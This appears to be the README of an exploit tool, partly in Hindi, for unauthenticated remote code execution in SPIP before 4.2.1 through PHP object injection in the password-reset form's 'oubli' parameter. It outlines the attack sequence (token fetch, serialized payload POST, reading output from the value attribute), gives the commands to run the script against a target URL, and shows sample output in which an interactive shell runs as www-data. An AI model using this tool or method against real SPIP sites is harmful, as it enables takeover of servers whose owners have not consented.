
Unauthenticated remote code execution vulnerability in SPIP before 4.2.1.
SPIP 4.2.1 से पहले के संस्करण में प्रमाणीकरण-रहित रिमोट कोड निष्पादन भेद्यता। पासवर्ड रीसेट फॉर्म में
oubliपैरामीटर गलत डिसीरियलाइज़ेशन के कारण PHP ऑब्जेक्ट इंजेक्शन के लिए संवेदनशील है। एक क्राफ्टेड सीरियलाइज़्ड पेलोड वेब उपयोगकर्ता के रूप में सर्वर-साइड पर निष्पादित होता है, और आउटपुट प्रतिक्रिया मेंoubliइनपुट फ़ील्ड मान के अंदर वापस परावर्तित होता है।
/spip.php?page=spip_pass से एंटी-CSRF टोकन प्राप्त करता है।oubli पैरामीटर में PHP सीरियलाइज़्ड पेलोड इंजेक्ट करते हुए एक POST अनुरोध भेजता है।value विशेषता से कमांड आउटपुट निकालता है।python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
उदाहरण:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] एंटी-CSRF टोकन प्राप्त किया जा रहा है...
[*] कमांड निष्पादन का परीक्षण किया जा रहा है...
[+] लक्ष्य संवेदनशील है! आउटपुट: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] शेल खोला गया। बाहर निकलने के लिए 'exit' या Ctrl+C टाइप करें।
Shell> whoami
www-data